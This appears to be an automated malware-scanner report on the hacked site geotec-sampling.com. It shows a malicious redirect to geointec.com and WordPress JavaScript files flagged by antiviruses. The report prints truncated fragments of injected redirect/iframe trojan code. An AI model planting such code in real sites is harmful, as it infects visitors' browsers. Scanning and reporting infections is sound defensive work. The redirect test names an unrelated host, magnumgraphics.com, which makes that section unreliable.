New scan:

Malware Scanner report for geotec-sampling.com

Malicious/Suspicious/Total urls checked
7/2/16
9 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "geotec-sampling.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
Found
The website redirects visitors to the 3rd-party URL:
->http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com
www.geointec.com is marked by Google as malicious.

The website "geotec-sampling.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/6
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=geotec-sampling.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://geotec-sampling.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: magnumgraphics.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Sep 2014 21:49:25 GMT
Accept-Ranges: bytes
ETag: "1998209-583-4cd7c210"
Server: Apache
Content-Length: 1411
Content-Type: text/html
Last-Modified: Mon, 08 Nov 2010 09:25:36 GMT

...1411 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: magnumgraphics.com
Referer: http://www.google.com/search?q=magnumgraphics.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Scanned pages/files

RequestServer responseStatus
http://www.geotec-sampling.com/
200 OK
Content-Length: 855
Content-Type: text/html
suspicious
Page code contains blacklisted domain: asg-geotecnia.es

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<ul><li><a href=".ftpquota"> .ftpquota</a></li>
<li><a href="asg-geotecnia.es/"> asg-geotecnia.es/</a></li>
<li><a href="cgi-bin/"> cgi-bin/</a></li>
<li><a href="geointec.com/"> geointec.com/</a></li>
<li><a href="geotec-sampling.com/"> geotec-sampling.com/</a></li>
<li><a href="hmoreno/"> hmoreno/</a></li>
<li><a href="readme.html"> readme.html</a></li>
&l
...[520 bytes skipped]...

http://www.geotec-sampling.com/.ftpquota
403 Forbidden
Content-Length: 330
Content-Type: text/html
clean
http://www.geotec-sampling.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://www.geotec-sampling.com/asg-geotecnia.es/
200 OK
Content-Length: 316
Content-Type: text/html
suspicious
Page code contains blacklisted domain: asg-geotecnia.es

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /asg-geotecnia.es</title>
</head>
<body>
<h1>Index of /asg-geotecnia.es</h1>
<ul><li><a href="/"> Parent Directory</a></li>
<li><a href="google36d5d9cc0ca81a66.html"> google36d5d9cc0ca81a66.html</a></li>
</ul>
</body></html>

http://www.geotec-sampling.com/asg-geotecnia.es/google36d5d9cc0ca81a66.html
200 OK
Content-Length: 53
Content-Type: text/html
clean
http://www.geotec-sampling.com/cgi-bin/
403 Forbidden
Content-Length: 329
Content-Type: text/html
clean
http://www.geotec-sampling.com/geointec.com/
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 10 Oct 2014 22:05:30 GMT
Location: http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com
Server: nginx admin
Content-Length: 0
Content-Type: text/html
X-Cache: HIT from Backend
X-Powered-By: PHP/5.3.28
malicious
http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com
200 OK
Content-Length: 63418
Content-Type: text/html
clean
http://www.geointec.com/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 95807
Content-Type: application/javascript
clean
http://www.geointec.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://www.geointec.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.5.95&ver=4.0
200 OK
Content-Length: 95731
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3171 bytes are skipped ...
his);if(t.is("img:uncached")){s.push({src:t.attr("src"),element:t[0]})}e.each(o,function(e,n){var r=t.css(n);if(!r){return true}var i;while(i=u.exec(r)){s.push({src:i[2],element:t[0]})}})})}else{i.find("img:uncached").each(function(){s.push({src:this.src,element:this})})}var f=s.length,l=0;if(f==0){t.call(i[0])}e.each(s,function(r,s){var o=new Image;e(o).bind("load error",function(e){l++;n.call(s.element,l,f,e.type=="load");if(l==f){t.call(i[0]);return false}});o.src=s.src})})};
})(jQuery)

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.5.95&ver=4.0
200 OK
Content-Length: 107645
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3278 bytes are skipped ...
ainer");var n=t.parent();var r=n.offset();var i=n.find(".bullet:first").outerWidth(true);var s=n.find(".bullet.selected").index()*i;var o=n.width();var i=n.find(".bullet:first").outerWidth(true);var u=i*e.find(">ul:first >li").length;var a=u-o;var f=a/o;var l=0-s;if(l>0)l=0;if(l<0-u+o)l=0-u+o;if(!n.hasClass("over")){rt(n,l,200)}};var rt=function(e,t,n){punchgs.TweenLite.to(e.find(".tp-thumbcontainer"),.2,{force3D:"auto",left:t,ease:punchgs.Power3.easeOut,overwrite:"auto"})}})(jQuery)

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/themes/rttheme18/js/modernizr.min.js?ver=4.0
200 OK
Content-Length: 15865
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3267 bytes are skipped ...
s,0))},Modernizr.addTest("cssfilters",function(){var a=document.createElement("div");return a.style.cssText=Modernizr._prefixes.join("filter:blur(2px); "),!!a.style.length&&(document.documentMode===undefined||document.documentMode>9)}),Modernizr.addTest("cssresize",Modernizr.testAllProps("resize")),Modernizr.addTest("svgfilters",function(){var a=!1;try{a=typeof SVGFEColorMatrixElement!==undefined&&SVGFEColorMatrixElement.SVG_FECOLORMATRIX_TYPE_SATURATE==2}catch(b){}return a});

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.18
200 OK
Content-Length: 17265
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3243 bytes are skipped ...
{this.checked=f}else{if(this.tagName.toLowerCase()=="option"){var h=e(this).parent("select");if(f&&h[0]&&h[0].type=="select-one"){h.find("option").selected(false)}this.selected=f}}})};e.fn.ajaxSubmit.debug=false;function d(){if(!e.fn.ajaxSubmit.debug){return}var f="[jquery.form] "+Array.prototype.join.call(arguments,"");if(window.console&&window.console.log){window.console.log(f)}else{if(window.opera&&window.opera.postError){window.opera.postError(f)}}}})(jQuery);

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1
200 OK
Content-Length: 9103
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3442 bytes are skipped ...
ind('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked');
$(this).find('span.wpcf7-not-valid-tip').remove();
$(this).find('img.ajax-loader').css({ visibility: 'hidden' });
});
};
$.fn.wpcf7FillResponseOutput = function(message) {
return this.each(function() {
$(this).find('div.wpcf7-response-output').append(message).slideDown('fast');
});
};
})(jQuery);

Antivirus reports:

Avast
JS:Iframe-EJZ [Trj]
Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JV!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KF

http://www.geointec.com/wp-content/themes/rttheme18/js/jquery.easing.1.3.js?ver=4.0
200 OK
Content-Length: 8704
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {

var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo
... 3471 bytes are skipped ...
r/> } else if (t < (2/2.75)) {
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
} else if (t < (2.5/2.75)) {
return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
} else {
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
}
});

Antivirus reports:

Sophos
Troj/JSRedir-OI